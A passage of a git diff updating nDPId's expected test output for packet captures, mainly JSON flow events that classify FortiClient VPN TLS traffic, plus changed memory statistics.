{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067206773,"flow_last_seen":1621067207049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067207049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01408{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067206773,"flow_last_seen":1621067207050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067207050,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067206773,"flow_last_seen":1621067206977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067206977,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067206773,"flow_last_seen":1621067207049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067207049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01408{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067206773,"flow_last_seen":1621067207050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067207050,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067209199,"flow_last_seen":1621067209199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067209199,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1621067209199,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067209199,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF8KMsekCMzAAAAALAC\/\/8eiQAAAgQFtAEDAwUBAQgKJ6dSCQAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1621067209262,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067209262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA81pJAADQGLXFSUS4NwKgBsijL8XxcuXqIHpAjNKASOECG6AAAAgQFrAQCCAoGP5LWJ6dSCQEDAwo="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1621067209262,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067209262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF8KMsekCM0XLl6iYAQECzdhQAAAQEICienUkcGP5LW"} -01143{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067209199,"flow_last_seen":1621067209264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1621067209264,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067209199,"flow_last_seen":1621067209346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1753,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1621067209346,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01466{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067209199,"flow_last_seen":1621067209348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1621067209348,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} -00943{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1621067203571,"flow_last_seen":1621067204682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3422,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1621067204622,"flow_last_seen":1621067205708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6751,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1621067205651,"flow_last_seen":1621067206738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3853,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1621067206773,"flow_last_seen":1621067207860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7276,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} -00956{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1901,"flow_first_seen":1621067209199,"flow_last_seen":1621067222261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":277457,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +01143{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067209199,"flow_last_seen":1621067209264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1621067209264,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01200{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067209199,"flow_last_seen":1621067209346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1753,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1621067209346,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01466{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067209199,"flow_last_seen":1621067209348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1621067209348,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +00943{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1621067203571,"flow_last_seen":1621067204682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3422,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1621067204622,"flow_last_seen":1621067205708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6751,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1621067205651,"flow_last_seen":1621067206738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3853,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1621067206773,"flow_last_seen":1621067207860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7276,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} +00956{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1901,"flow_first_seen":1621067209199,"flow_last_seen":1621067222261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":277457,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","packets-captured":2000,"packets-processed":2000,"total-skipped-flows":0,"total-l4-payload-len":298759,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":43,"global_ts_msec":1621067222261} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2000/2000 @@ -49,9 +49,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5962796 bytes -~~ total memory freed........: 5962796 bytes -~~ total allocations/frees...: 120158/120158 +~~ total memory allocated....: 6096430 bytes +~~ total memory freed........: 6096430 bytes +~~ total allocations/frees...: 122920/122920 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 1471 chars diff --git a/test/results/ftp-start-tls.pcap.out b/test/results/ftp-start-tls.pcap.out index c395ef4ef..417f2c450 100644 --- a/test/results/ftp-start-tls.pcap.out +++ b/test/results/ftp-start-tls.pcap.out @@ -4,8 +4,8 @@ 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383123629078,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFOAAs3ocAAP8GetIK7hokCtwyTPKMABUzQlCKAAAAAGACIACjMgAAAgQCAAAA"} 